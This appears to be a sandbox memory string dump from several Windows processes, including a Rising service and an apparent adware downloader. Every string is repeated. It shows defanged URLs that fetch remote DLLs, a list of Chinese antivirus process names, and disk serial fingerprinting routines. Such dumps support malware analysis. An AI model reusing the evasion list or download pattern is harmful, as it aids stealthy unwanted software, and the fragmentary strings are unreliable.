PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
SYSTEMROOT=%WinDir%
SYSTEMROOT=%WinDir%
TEMP=%WinDir%\TEMP
TEMP=%WinDir%\TEMP
TMP=%WinDir%\TEMP
TMP=%WinDir%\TEMP
COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
\COMMAND.COM
\COMMAND.COM
COMSPEC=\COMMAND.COM
COMSPEC=\COMMAND.COM
BMicrosoft(R) Windows DOS
BMicrosoft(R) Windows DOS
FCOMMAND [[drive:]path] [device] [/E:nnnnn] [/P] [/C string] [/MSG]
FCOMMAND [[drive:]path] [device] [/E:nnnnn] [/P] [/C string] [/MSG]
H [drive:]path Specifies the directory containing COMMAND.COM file.
H [drive:]path Specifies the directory containing COMMAND.COM file.
N /MSG Specifies that all error messages be stored in memory. You
N /MSG Specifies that all error messages be stored in memory. You
%Intermediate file error during pipe
%Intermediate file error during pipe
Switches may be preset in the DIRCMD environment variable. Override
Switches may be preset in the DIRCMD environment variable. Override
>Quits the COMMAND.COM program (command interpreter).
>Quits the COMMAND.COM program (command interpreter).
]Displays or sets a search path for executable files.
]Displays or sets a search path for executable files.
$B | (pipe)
$B | (pipe)
%Displays the MS-DOS version.
%Displays the MS-DOS version.
LRecords comments (remarks) in a batch file or CONFIG.SYS.
LRecords comments (remarks) in a batch file or CONFIG.SYS.
key to continue...."
key to continue...."
PATH=PROMPT=COMSPEC=DIRCMD=
PATH=PROMPT=COMSPEC=DIRCMD=
.COM.EXE.BAT?VBAPWRHSvDANEDSG
.COM.EXE.BAT?VBAPWRHSvDANEDSG
%WinDir%\SYSTEM32
%WinDir%\SYSTEM32
[]| =;"
[]| =;"
ntvdm.exe_680_rwx_00010000_00090000:
COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
%WinDir%\TEMP\scs4.tmp
%WinDir%\TEMP\scs4.tmp
89:;?
89:;?
0WINDOWS MS-DOS STARTUP FILE
0WINDOWS MS-DOS STARTUP FILE
0CONFIG.SYS VS CONFIG.NT
0CONFIG.SYS VS CONFIG.NT
0CONFIG.SYS IS NOT USED TO INITIALIZE THE MS-DOS ENVIRONMENT.
0CONFIG.SYS IS NOT USED TO INITIALIZE THE MS-DOS ENVIRONMENT.
0CONFIG.NT IS USED TO INITIALIZE THE MS-DOS ENVIRONMENT UNLESS A
0CONFIG.NT IS USED TO INITIALIZE THE MS-DOS ENVIRONMENT UNLESS A
0IS INITIALIZED. TO DISPLAY CONFIG.NT/AUTOEXEC.NT INFORMATION, ADD
0IS INITIALIZED. TO DISPLAY CONFIG.NT/AUTOEXEC.NT INFORMATION, ADD
0THE COMMAND ECHOCONFIG TO CONFIG.NT OR OTHER STARTUP FILE.
0THE COMMAND ECHOCONFIG TO CONFIG.NT OR OTHER STARTUP FILE.
0NTCMDPROMPT
0NTCMDPROMPT
0MS-DOS-BASED APPLICATION, WINDOWS RUNS COMMAND.COM. THIS ALLOWS THE
0MS-DOS-BASED APPLICATION, WINDOWS RUNS COMMAND.COM. THIS ALLOWS THE
0TSR TO REMAIN ACTIVE. TO RUN CMD.EXE, THE WINDOWS COMMAND PROMPT,
0TSR TO REMAIN ACTIVE. TO RUN CMD.EXE, THE WINDOWS COMMAND PROMPT,
0RATHER THAN COMMAND.COM, ADD THE COMMAND NTCMDPROMPT TO CONFIG.NT OR
0RATHER THAN COMMAND.COM, ADD THE COMMAND NTCMDPROMPT TO CONFIG.NT OR
0COMMAND.COM. IF YOU START AN APPLICATION OTHER THAN AN MS-DOS-BASED
0COMMAND.COM. IF YOU START AN APPLICATION OTHER THAN AN MS-DOS-BASED
0CONFIG.NT OR OTHER STARTUP FILE.
0CONFIG.NT OR OTHER STARTUP FILE.
0WANT THE SYSTEM TO SUPPORT. 1
0WANT THE SYSTEM TO SUPPORT. 1
0AND LEAVE THE RESTS(IF AVAILABLE) TO BE USED BY DOS TO SUPPORT
0AND LEAVE THE RESTS(IF AVAILABLE) TO BE USED BY DOS TO SUPPORT
0WITH YOUR APPLICATION OR _DEFAULT.PIF). IF THE SIZE FROM PIF FILE
0WITH YOUR APPLICATION OR _DEFAULT.PIF). IF THE SIZE FROM PIF FILE
D%WinDir%\SYSTEM32\HIMEM.SYS
D%WinDir%\SYSTEM32\HIMEM.SYS
Q001,437,%WinDir%\SYSTEM32\COUNTRY.SYS
Q001,437,%WinDir%\SYSTEM32\COUNTRY.SYS
S%WinDir%\SYSTEM32\COMMAND.COM
S%WinDir%\SYSTEM32\COMMAND.COM
/P %WinDir%\SYSTEM32
/P %WinDir%\SYSTEM32
ATION OR _DEFAULT.PIF). IF THE SIZE FROM PIF FILE
ATION OR _DEFAULT.PIF). IF THE SIZE FROM PIF FILE
DEVICE=%WinDir%\SYSTEM32\HIMEM.SYS
DEVICE=%WinDir%\SYSTEM32\HIMEM.SYS
COUNTRY=001,437,%WinDir%\SYSTEM32\COUNTRY.SYS
COUNTRY=001,437,%WinDir%\SYSTEM32\COUNTRY.SYS
SHELL=%WinDir%\SYSTEM32\COMMAND.COM /P %WinDir%\SYSTEM32
SHELL=%WinDir%\SYSTEM32\COMMAND.COM /P %WinDir%\SYSTEM32
%WinDir%\SYSTEM32\COUNTRY.SYS
%WinDir%\SYSTEM32\COUNTRY.SYS
[]| =;"
[]| =;"
%WinDir%\TEMP\scs3.tmp
%WinDir%\TEMP\scs3.tmp
%WinDir%\SYSTEM32\COMMAND.COM
%WinDir%\SYSTEM32\COMMAND.COM
NTCMDPROMPTT
NTCMDPROMPTT
Unrecognized command in CONFIG.SYS
Unrecognized command in CONFIG.SYS
Insufficient memory for COUNTRY.SYS file
Insufficient memory for COUNTRY.SYS file
Incorrect order in CONFIG.SYS line $Error in CONFIG.SYS line $WARNING! Logical drives past Z: exist and will be ignored
Incorrect order in CONFIG.SYS line $Error in CONFIG.SYS line $WARNING! Logical drives past Z: exist and will be ignored
1234567890-=
1234567890-=
!@#$%^&*()_
!@#$%^&*()_
789-456 1230.
789-456 1230.
!"#$%&,-./012
!"#$%&,-./012
00030
00030
30333
30333
?0?3???
?0?3???
Windows NT MS-DOS subsystem Mouse Driver
Windows NT MS-DOS subsystem Mouse Driver
/)()(00)(
/)()(00)(
/@%}-{.Nb#b
/@%}-{.Nb#b
!Press any key to continue . . .
!Press any key to continue . . .
%Intermediate file error during pipe
%Intermediate file error during pipe
Switches may be preset in the DIRCMD environment variable. Override
Switches may be preset in the DIRCMD environment variable. Override
>Quits the COMMAND.COM program (command interpreter).
>Quits the COMMAND.COM program (command interpreter).
]Displays or sets a search path for executable files.
]Displays or sets a search path for executable files.
$B | (pipe)
$B | (pipe)
%Displays the MS-DOS version.
%Displays the MS-DOS version.
LRecords comments (remarks) in a batch file or CONFIG.SYS.
LRecords comments (remarks) in a batch file or CONFIG.SYS.
key to continue...."
key to continue...."
PATH=PROMPT=COMSPEC=DIRCMD=
PATH=PROMPT=COMSPEC=DIRCMD=
.COM.EXE.BAT?VBAPWRHSvDANEDSG
.COM.EXE.BAT?VBAPWRHSvDANEDSG
%WinDir%\SYSTEM32\DOSX
%WinDir%\SYSTEM32\DOSX
NT.EXE
NT.EXE
C:\SETUP_~1.EXE
C:\SETUP_~1.EXE
m32\DOSX.EXE
m32\DOSX.EXE
nt.exe
nt.exe
DOSX.EXE
DOSX.EXE
ntvdm.exe_680_rwx_000A0000_00020000:
66666666
66666666
6666666
6666666
6666666666666666
6666666666666666
6666666676666666
6666666676666666
6666667076666666
6666667076666666
ntvdm.exe_680_rwx_000C9000_00013000:
COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
COMSPEC=%WinDir%\SYSTEM32\COMMAND.COM
OS=Windows_NT
OS=Windows_NT
PATH=C:\Perl\site\bin;C:\Perl\bin;%System%;%WinDir%;%WinDir%\System32\Wbem;c:\PROGRA~1\WIRESH~1
PATH=C:\Perl\site\bin;C:\Perl\bin;%System%;%WinDir%;%WinDir%\System32\Wbem;c:\PROGRA~1\WIRESH~1
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
SYSTEMROOT=%WinDir%
SYSTEMROOT=%WinDir%
TEMP=%WinDir%\TEMP
TEMP=%WinDir%\TEMP
TMP=%WinDir%\TEMP
TMP=%WinDir%\TEMP
%System%\DOSX.EXE
%System%\DOSX.EXE
%System%\mscdexnt.exe
%System%\mscdexnt.exe
VCDEX.DLL
VCDEX.DLL
%System%\redir
%System%\redir
(load before dosx.exe)
(load before dosx.exe)
C:\LANMAN.DOS
C:\LANMAN.DOS
%System%\dosx
%System%\dosx
%System%\krnl386.exe
%System%\krnl386.exe
krnl386.exe
krnl386.exe
SYSTEM.INI
SYSTEM.INI
ntvdm.exe_680_rwx_000E8000_00008000:
00030
00030
30333
30333
?0?3???
?0?3???
Windows NT MS-DOS subsystem Mouse Driver
Windows NT MS-DOS subsystem Mouse Driver
ntvdm.exe_680_rwx_00100000_00010000:
/)()(00)(
/)()(00)(
/@%}-{.Nb#b
/@%}-{.Nb#b
to run Windows in Enhanced Mode
to run Windows in Enhanced Mode
69797:6%7'6
69797:6%7'6
C%D%DGDGD8EyD
C%D%DGDGD8EyD
RsMgrSvc.exe_468:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
t%ShH;B
t%ShH;B
|$D.tD
|$D.tD
CryptDecodeObject failed with %x
CryptDecodeObject failed with %x
wintrust.dll
wintrust.dll
WTHelperGetProvCertFromChain
WTHelperGetProvCertFromChain
CryptCATCatalogInfoFromContext
CryptCATCatalogInfoFromContext
crypt32.dll
crypt32.dll
CryptMsgGetParam
CryptMsgGetParam
CryptSIPVerifyIndirectData failed with %x
CryptSIPVerifyIndirectData failed with %x
1.3.6.1.4.1.311.2.1.4
1.3.6.1.4.1.311.2.1.4
CryptMsgGetParam(%d) failed with %x
CryptMsgGetParam(%d) failed with %x
CryptSIPRetrieveSubjectGuid failed with %x
CryptSIPRetrieveSubjectGuid failed with %x
CryptQueryObject failed with %x
CryptQueryObject failed with %x
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
Iphlpapi.dll
Iphlpapi.dll
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
Advapi32.dll
Advapi32.dll
\Rising\RSD\RsMgrSvc.exe"
\Rising\RSD\RsMgrSvc.exe"
Explorer.exe
Explorer.exe
XXXXXXXXXXX
XXXXXXXXXXX
{X-X-X-XX-XXXXXX}
{X-X-X-XX-XXXXXX}
CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}
CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
[d-d-d][d:d:d:d]
[d-d-d][d:d:d:d]
SHFolder.dll
SHFolder.dll
Shell32.dll
Shell32.dll
SOFTWARE\Rising\%s
SOFTWARE\Rising\%s
2.log
2.log
[u]
[u]
[0xX]
[0xX]
RAV.INI
RAV.INI
WinSessionThread GetPidByName dwPID = %d , name=%s!
WinSessionThread GetPidByName dwPID = %d , name=%s!
NtDll.dll
NtDll.dll
Kernel32.dll
Kernel32.dll
WTSQueryUserToken Failed! Err Code: %d
WTSQueryUserToken Failed! Err Code: %d
wtsapi32.DLL
wtsapi32.DLL
OpenProcess Failed! Err Code: %d
OpenProcess Failed! Err Code: %d
GetProcAddress(OpenProcessToken) Failed! Err Code: %d
GetProcAddress(OpenProcessToken) Failed! Err Code: %d
OpenProcessToken Failed! Err Code: %d
OpenProcessToken Failed! Err Code: %d
GetLogonUserToken(%d)
GetLogonUserToken(%d)
>`userinit.exe
>`userinit.exe
CRsMgrSvc::WaitForLogonNT:LoadLibrary(_"psapi.dll");err=0x%x
CRsMgrSvc::WaitForLogonNT:LoadLibrary(_"psapi.dll");err=0x%x
psapi.dll
psapi.dll
Fail to OpenProcessToken; 0x%x
Fail to OpenProcessToken; 0x%x
Failed to call CreateProcessAsUser again: appname = %s cmd=%s;err=0x%x.
Failed to call CreateProcessAsUser again: appname = %s cmd=%s;err=0x%x.
Failed to SetTokenInformation(0):err=0x%x
Failed to SetTokenInformation(0):err=0x%x
Failed to call CreateProcessAsUser:cmd=%s;err=0x%x.
Failed to call CreateProcessAsUser:cmd=%s;err=0x%x.
Failed to DuplicateTokenEx:err=0x%x
Failed to DuplicateTokenEx:err=0x%x
Failed to SetTokenInformation:err=0x%x
Failed to SetTokenInformation:err=0x%x
SessionId = %d
SessionId = %d
Failed to LoadLibrary("Wtsapi32.dll"):err=0x
Failed to LoadLibrary("Wtsapi32.dll"):err=0x
Failed to call WTSEnumerateSessions:err=0x%x
Failed to call WTSEnumerateSessions:err=0x%x
SessionInfo[%d]: SessionId=%d; WinStationName=%s; State=%d.
SessionInfo[%d]: SessionId=%d; WinStationName=%s; State=%d.
Wtsapi32.dll
Wtsapi32.dll
Failed to CreateProcess:%s;err=0x%x
Failed to CreateProcess:%s;err=0x%x
Failed to LoadLibrary("Wtsapi32.dll"):err=0x%x
Failed to LoadLibrary("Wtsapi32.dll"):err=0x%x
Failed to WTSEnumerateSessions:err=0x%x
Failed to WTSEnumerateSessions:err=0x%x
Session\%d\RSD_POP_MESSAGE_INFO
Session\%d\RSD_POP_MESSAGE_INFO
WinSessionThread CreateProcess ret = %d end !
WinSessionThread CreateProcess ret = %d end !
WinSessionThread CreateProcess pid = %d, CreateProcessAsUser err = %d !
WinSessionThread CreateProcess pid = %d, CreateProcessAsUser err = %d !
Userenv.DLL
Userenv.DLL
WinSessionThread CreateProcess begin dwSessionID = %d!
WinSessionThread CreateProcess begin dwSessionID = %d!
Failed to LoadLibrary("Userenv.DLL"):err=0x%x
Failed to LoadLibrary("Userenv.DLL"):err=0x%x
Failed to call CreateProcessAsUser: cmd=%s;err=0x%x.
Failed to call CreateProcessAsUser: cmd=%s;err=0x%x.
New Failed to call WTSQueryUserToken, err= 0x%x
New Failed to call WTSQueryUserToken, err= 0x%x
rsmsg
rsmsg
%s\rsmsginfo.ini
%s\rsmsginfo.ini
Failed to open the shell ready event: 0x%x
Failed to open the shell ready event: 0x%x
"%s" /shellrun
"%s" /shellrun
%s\RsStub.exe
%s\RsStub.exe
Session\%d\ShellReadyEvent
Session\%d\ShellReadyEvent
LogonRun - session : %d
LogonRun - session : %d
Failed to call RegOpenKeyEx, err = 0x%x
Failed to call RegOpenKeyEx, err = 0x%x
Failed to call RegSaveKey, err = 0x%x
Failed to call RegSaveKey, err = 0x%x
Failed to call AdjustTokenPrivileges, err = 0x%x
Failed to call AdjustTokenPrivileges, err = 0x%x
Failed to call OpenPrcessToken, err = 0x%x
Failed to call OpenPrcessToken, err = 0x%x
%s\RsMgrSvc.dat
%s\RsMgrSvc.dat
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
BaiduAnSvc.exe
BaiduAnSvc.exe
BaiduSdSvc.exe
BaiduSdSvc.exe
liebao.exe
liebao.exe
ksafe.exe
ksafe.exe
{849B7E2B-0551-429C-B317-14B7D374D6EC}_is1
{849B7E2B-0551-429C-B317-14B7D374D6EC}_is1
kxescore.exe
kxescore.exe
QQPCRtp.exe
QQPCRtp.exe
360sd.exe
360sd.exe
360se.exe
360se.exe
{23F3F476-BE34-4f48-9C77-2806A8393EC4}
{23F3F476-BE34-4f48-9C77-2806A8393EC4}
360Desktop.exe
360Desktop.exe
ZhuDongFangYu.exe
ZhuDongFangYu.exe
safeboxTray.exe
safeboxTray.exe
Failed to Create LogonRunThread Thread, err = 0x%x
Failed to Create LogonRunThread Thread, err = 0x%x
SessionChange:EventType=%d; sessionID = %d
SessionChange:EventType=%d; sessionID = %d
\Backup\RSD\RSSetup\RSSetup.xml
\Backup\RSD\RSSetup\RSSetup.xml
rsup10.rising.com.cn
rsup10.rising.com.cn
u.suxiazai.com
u.suxiazai.com
%s?t=0&info=%s
%s?t=0&info=%s
ver=%s&guid=%s&sguid=%s&state=%s
ver=%s&guid=%s&sguid=%s&state=%s
hXXp://u.suxiazai.com/menu/info.xml
hXXp://u.suxiazai.com/menu/info.xml
hXXp://rsup10.rising.com.cn/menu/info.xml
hXXp://rsup10.rising.com.cn/menu/info.xml
%srsd\info.xml
%srsd\info.xml
/subkey
/subkey
Failed to Verify the "%s".
Failed to Verify the "%s".
Failed to call vf.Init.
Failed to call vf.Init.
%s\rsbackup.exe
%s\rsbackup.exe
"%s\rsbackup.exe"
"%s\rsbackup.exe"
/subkey
/subkey
%s\RsMgrSvc.ini
%s\RsMgrSvc.ini
%s\updater.exe
%s\updater.exe
"%s\updater.exe"
"%s\updater.exe"
DeleteFile: %s.
DeleteFile: %s.
ITEM%d
ITEM%d
\RsMgrSvc.ini
\RsMgrSvc.ini
DeletePath: %s.
DeletePath: %s.
Clean WillReboot In %s
Clean WillReboot In %s
%s\%s\%s.ini
%s\%s\%s.ini
1971-01-01 00:00:00
1971-01-01 00:00:00
%d-%d-%d %d:%d:%d
%d-%d-%d %d:%d:%d
%s\Data
%s\Data
%s /subkey %s /RsMgrSvc
%s /subkey %s /RsMgrSvc
"%s\Updater.exe" /silence
"%s\Updater.exe" /silence
%s\Updater.exe
%s\Updater.exe
\Reboot.ini
\Reboot.ini
CRsMgrSvc::SVC:Failed to CreateEvent-Wait: err=0x%x
CRsMgrSvc::SVC:Failed to CreateEvent-Wait: err=0x%x
CRsMgrSvc::SVC:Failed to CreateEvent, err=0x%x
CRsMgrSvc::SVC:Failed to CreateEvent, err=0x%x
comx3.dll
comx3.dll
KERNEL32.DLL
KERNEL32.DLL
kernel32.dll
kernel32.dll
MSIE %d.%d
MSIE %d.%d
WININET.DLL
WININET.DLL
Windows
Windows
Windows Me
Windows Me
Windows 98
Windows 98
Windows 95
Windows 95
Windows NT %d.%d
Windows NT %d.%d
%s:%d
%s:%d
Mozilla/4.0 (compatible; %s; %s; Rising)
Mozilla/4.0 (compatible; %s; %s; Rising)
HTTP/1.0
HTTP/1.0
Range: bytes=%d-
Range: bytes=%d-
RstoreDll.dll
RstoreDll.dll
@CRsUseRepairProduct::prstorestart %s Dllpath:%s
@CRsUseRepairProduct::prstorestart %s Dllpath:%s
@CRsUseRepairProduct::prstorestart %s
@CRsUseRepairProduct::prstorestart %s
Subkey: %s could not find dllPath ,so use rsd path:%s
Subkey: %s could not find dllPath ,so use rsd path:%s
Subkey: %s Path:%s
Subkey: %s Path:%s
\RstoreDll.dll
\RstoreDll.dll
02%d.d.d.d
02%d.d.d.d
CRsLoadCloud::DownLoadCldRsdDll... faild hre = %d ,lasterror = %d
CRsLoadCloud::DownLoadCldRsdDll... faild hre = %d ,lasterror = %d
CRsLoadCloud::LoadCldRsdDll... failed lasterror = %d
CRsLoadCloud::LoadCldRsdDll... failed lasterror = %d
CRsLoadCloud::LoadCldRsdDll...%s
CRsLoadCloud::LoadCldRsdDll...%s
CRsLoadCloud::StartTask...success
CRsLoadCloud::StartTask...success
CRsLoadCloud::InitData... CopyFile flag= %d.
CRsLoadCloud::InitData... CopyFile flag= %d.
hXXp://download.suxiazai.com/for_down/2013/new/dlls/CldRsd.dll
hXXp://download.suxiazai.com/for_down/2013/new/dlls/CldRsd.dll
CldRsd.dll
CldRsd.dll
mscoree.dll
mscoree.dll
internal state. The program cannot safely continue execution and must
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
continue execution and must now be terminated.
- This application cannot run using the active version of the Microsoft .NET Runtime
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
Please contact the application's support team for more information.
GetProcessWindowStation
GetProcessWindowStation
user32.dll
user32.dll
C:\DistributedAutoLink\Temp\CompileOutputDir\RsMgrSvc.pdb
C:\DistributedAutoLink\Temp\CompileOutputDir\RsMgrSvc.pdb
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyA
RegOpenKeyA
RegOpenKeyA
RegSaveKeyA
RegSaveKeyA
RegQueryInfoKeyA
RegQueryInfoKeyA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
CryptMsgClose
CryptMsgClose
CertCloseStore
CertCloseStore
CertGetNameStringW
CertGetNameStringW
CertFindCertificateInStore
CertFindCertificateInStore
CRYPT32.dll
CRYPT32.dll
RPCRT4.dll
RPCRT4.dll
InternetCrackUrlA
InternetCrackUrlA
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
WININET.dll
WININET.dll
VERSION.dll
VERSION.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%Program Files%\Rising\RSD\RsMgrSvc.exe.log
%Program Files%\Rising\RSD\RsMgrSvc.exe.log
%Program Files%\Rising\RSD\RsMgrSvc.exe
%Program Files%\Rising\RSD\RsMgrSvc.exe
.Beijing Rising Information Technology Corporation Limited
.Beijing Rising Information Technology Corporation Limited
1.0.0.50
1.0.0.50
RsMgrSvc.exe
RsMgrSvc.exe
20150423153938597
20150423153938597
popwndexe.exe_592:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
C:\DistributedAutoLink\Temp\CompileOutputDir\popwndexe.pdb
C:\DistributedAutoLink\Temp\CompileOutputDir\popwndexe.pdb
KERNEL32.dll
KERNEL32.dll
ole32.dll
ole32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
>$>(>,>0>
>$>(>,>0>
5(565;5~7
5(565;5~7
mscoree.dll
mscoree.dll
KERNEL32.DLL
KERNEL32.DLL
rsdk.dll
rsdk.dll
BUF:{E59BC62D-64AB-439D-BAF3-B2D1BA15E441}{4F496E7F-D8FD-4DED-967D-C4F53BFB9452}{216DFF2F-B2F0-4CE0-BA5B-72E0B7BFAC28}{C8CA7580-8E65-49E6-A66A-B087C7EF523D}{5D37C04C-8F58-4D47-94C8-B94153399473}{ED20E0E5-2357-4825-B3FA-198AEC674E81}{AD4F3A47-0CD6-43DE-BC22-E8BE24FFD424}{2100E98D-B13E-4306-8081-50F325B10586}{0AEF80FB-9BAF-4E66-96B3-784ED0FCECF1}{E8D494C-D598-4E2F-B796-809E74315E76}{95EAB9C4-A7F4-46A8-A69F-54911364F2F0}{EBC23555-424F-45C3-BECE-206819CB276B}{4FCE6281-8849-4FC6-A764-95C793EB8A48}{FCA0E62A-5DD4-46FB-AFB2-BDC74EA7DB36}{35FD921E-B758-46D8-B0AA-FCD033B0E66D}{201409F6-22F8-48D3-A69F-7935BDDE6BFA}{787683B8-D58D-4072-BA04-46284CEA5AF8}{224E5B34-E98F-4033-8B6F-46B758E7587E}{23BD3E3A-72ED-4AE4-A5A9-41B466BA8D25}{B769D42A-2392-42B6-8C10-DB99AE23F75A}{1DDF6C09-67B3-4b05-B3A4-43D7D92D067C}{56CF1F5A-D59E-4fe7-BE35-066F4E788E2A}
BUF:{E59BC62D-64AB-439D-BAF3-B2D1BA15E441}{4F496E7F-D8FD-4DED-967D-C4F53BFB9452}{216DFF2F-B2F0-4CE0-BA5B-72E0B7BFAC28}{C8CA7580-8E65-49E6-A66A-B087C7EF523D}{5D37C04C-8F58-4D47-94C8-B94153399473}{ED20E0E5-2357-4825-B3FA-198AEC674E81}{AD4F3A47-0CD6-43DE-BC22-E8BE24FFD424}{2100E98D-B13E-4306-8081-50F325B10586}{0AEF80FB-9BAF-4E66-96B3-784ED0FCECF1}{E8D494C-D598-4E2F-B796-809E74315E76}{95EAB9C4-A7F4-46A8-A69F-54911364F2F0}{EBC23555-424F-45C3-BECE-206819CB276B}{4FCE6281-8849-4FC6-A764-95C793EB8A48}{FCA0E62A-5DD4-46FB-AFB2-BDC74EA7DB36}{35FD921E-B758-46D8-B0AA-FCD033B0E66D}{201409F6-22F8-48D3-A69F-7935BDDE6BFA}{787683B8-D58D-4072-BA04-46284CEA5AF8}{224E5B34-E98F-4033-8B6F-46B758E7587E}{23BD3E3A-72ED-4AE4-A5A9-41B466BA8D25}{B769D42A-2392-42B6-8C10-DB99AE23F75A}{1DDF6C09-67B3-4b05-B3A4-43D7D92D067C}{56CF1F5A-D59E-4fe7-BE35-066F4E788E2A}
{{887FE1BB-7C1F-4d73-BD44-B726E1672DC7}}_%s
{{887FE1BB-7C1F-4d73-BD44-B726E1672DC7}}_%s
%Program Files%\Rising\RSD\popwndexe.exe
%Program Files%\Rising\RSD\popwndexe.exe
1.0.0.7
1.0.0.7
tray.exe
tray.exe
814210592210000
814210592210000
MM-liao8327.exe_1372:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
SSSSh
SSSSh
FtPh
FtPh
tGHt.Ht&
tGHt.Ht&
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnDocumentComplete: URL="%s"
OnDocumentComplete: URL="%s"
OnProgressChange: progress=%d, progress_max=%d
OnProgressChange: progress=%d, progress_max=%d
OnNavigationComplete2: URL="%s"
OnNavigationComplete2: URL="%s"
OnStatusTextChange: text="%s"
OnStatusTextChange: text="%s"
OnTitleChange: text="%s"
OnTitleChange: text="%s"
homeUrl
homeUrl
downUrl
downUrl
C:\Windows\Temp\temp.icon
C:\Windows\Temp\temp.icon
c://temp.icon
c://temp.icon
ProExe
ProExe
DownloadUrl
DownloadUrl
ErrorUrl
ErrorUrl
AdvertUrl
AdvertUrl
XieyiUrl
XieyiUrl
hXXp://tj.9158.com/Opendownloadernewxml.aspx
hXXp://tj.9158.com/Opendownloadernewxml.aspx
(3-!0,1'8"5.*2$
(3-!0,1'8"5.*2$
DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d
DeviceIOControl IOCTL_STORAGE_QUERY_PROPERTY error = %d
**** DISK_GEOMETRY_EX for drive %d ****
**** DISK_GEOMETRY_EX for drive %d ****
Disk is%s fixed
Disk is%s fixed
%d ReadPhysicalDriveInNTWithZeroRights ERROR|nDeviceIoControl(%s, IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0
%d ReadPhysicalDriveInNTWithZeroRights ERROR|nDeviceIoControl(%s, IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0
**** STORAGE_DEVICE_DESCRIPTOR for drive %d ****
**** STORAGE_DEVICE_DESCRIPTOR for drive %d ****
Vendor Id = [%s]
Vendor Id = [%s]
Product Id = [%s]
Product Id = [%s]
Product Revision = [%s]
Product Revision = [%s]
Serial Number = [%s]
Serial Number = [%s]
%d STORAGE_DEVICE_DESCRIPTOR contents for drive %d
%d STORAGE_DEVICE_DESCRIPTOR contents for drive %d
DeviceType: x
DeviceType: x
DeviceTypeModifier: x
DeviceTypeModifier: x
RemovableMedia: %d
RemovableMedia: %d
CommandQueueing: %d
CommandQueueing: %d
BusType: %d
BusType: %d
%d ReadPhysicalDriveInNTWithZeroRights ERROR
%d ReadPhysicalDriveInNTWithZeroRights ERROR
CreateFile(%s) returned INVALID_HANDLE_VALUE
CreateFile(%s) returned INVALID_HANDLE_VALUE
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
Drive%dType
Drive%dType
DriveÃœontrollerBufferSize
DriveÃœontrollerBufferSize
DriveÃœontrollerRevisionNumber
DriveÃœontrollerRevisionNumber
Drive%dSerialNumber
Drive%dSerialNumber
Drive%dModelNumber
Drive%dModelNumber
Controller Buffer Size on Drive___: %s bytes
Controller Buffer Size on Drive___: %s bytes
Drive Controller Revision Number__: [%s]
Drive Controller Revision Number__: [%s]
Drive Serial Number_______________: [%s]
Drive Serial Number_______________: [%s]
Drive Model Number________________: [%s]
Drive Model Number________________: [%s]
Drive %d -
Drive %d -
%d ReadPhysicalDriveInNTWithAdminRights ERROR
%d ReadPhysicalDriveInNTWithAdminRights ERROR
No device found at position %d (%d)
No device found at position %d (%d)
DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d
DeviceIoControl(%d, DFP_GET_VERSION) returned 0, error is %d
%d ReadPhysicalDriveInNTUsingSmart ERROR
%d ReadPhysicalDriveInNTUsingSmart ERROR
DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d
DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d
Error Code %d
Error Code %d
ERROR: Could not open IDE21201.VXD file
ERROR: Could not open IDE21201.VXD file
\\.\IDE21201.VXD
\\.\IDE21201.VXD
